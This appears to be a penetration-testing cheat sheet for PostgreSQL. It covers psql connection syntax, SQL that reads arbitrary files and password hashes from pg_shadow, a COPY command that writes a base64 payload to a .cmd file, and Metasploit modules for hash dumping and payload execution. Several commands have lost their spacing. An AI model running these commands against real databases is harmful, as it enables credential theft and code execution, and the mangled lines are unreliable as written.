PostgreSQL is an _**_open source object-relational database system that uses and extends the SQL language.
Default port: 5432, and if this port is already in use it seems that postgresql will use the next port (5433 probably) which is not in use.
PORT STATE SERVICE
5432/tcp open pgsql
Connect
psql-U<myuser># Open psql console with userpsql-h<host>-U<username>-d<database># Remote connectionpsql-h<host>-p<port>-U<username>-W<password><database># Remote connection
psql -h localhost -d <database_name>-U <User> #Password will be prompted\list # List databases\c <database> # use the database\d # List tables\du+ # Get users roles#Read a fileCREATETABLEdemo(t text);COPY demo from'[FILENAME]';SELECT*FROM demo;#Write ascii to a file (copyto cannot copybinarydata)COPY (select convert_from(decode('<B64 payload>','base64'),'utf-8')) to'C:\\some\\interesting\path.cmd'; #List databasesSELECT datname FROM pg_database;#Read credentials (usernames + pwd hash)SELECT usename, passwd from pg_shadow;#Checkif current user is superiserSELECT current_setting('is_superuser'); #If response is"on"then true, if"off"then false#Checkif plpgsql isenabledSELECT lanname,lanacl FROM pg_language WHERE lanname ='plpgsql'#Change passwordALTERUSER user_name WITHPASSWORD'new_password';#Check users privileges over a table (pg_shadow on this example)SELECT grantee, privilege_type FROM information_schema.role_table_grants WHERE table_name='pg_shadow'#Get users rolesSELECT r.rolname, r.rolsuper, r.rolinherit, r.rolcreaterole, r.rolcreatedb, r.rolcanlogin, r.rolconnlimit, r.rolvaliduntil,ARRAY(SELECT b.rolnameFROM pg_catalog.pg_auth_members mJOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)WHERE m.member = r.oid) as memberof, r.rolreplicationFROM pg_catalog.pg_roles rORDER BY1;
Enumeration
msf> use auxiliary/scanner/postgres/postgres_version
msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
Client authentication is controlled by a config file frequently named pg_hba.conf. This file has a set of records. A record may have one of the following seven formats:
Each record specifies a connection type, a client IP address range (if relevant for the connection type), a database name, a user name, and the authentication method to be used for connections matching these parameters. The first record with a matching connection type, client address, requested database, and user name is used to perform authentication. There is no "fall-through" or "backup": if one record is chosen and the authentication fails, subsequent records are not considered. If no record matches, access is denied.
The password-based authentication methods are md5, crypt, and password. These methods operate similarly except for the way that the password is sent across the connection: respectively, MD5-hashed, crypt-encrypted, and clear-text. A limitation is that the crypt method does not work with passwords that have been encrypted in pg_authid.
POST
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload
logging
Inside the postgresql.conf file you can enable postgresql logs changing:
log_statement='all'log_filename='postgresql-%Y-%m-%d_%H%M%S.log'logging_collector=onsudoservicepostgresqlrestart#Find the logs in /var/lib/postgresql/<PG_Version>/main/log/#or in /var/lib/postgresql/<PG_Version>/main/pg_log/
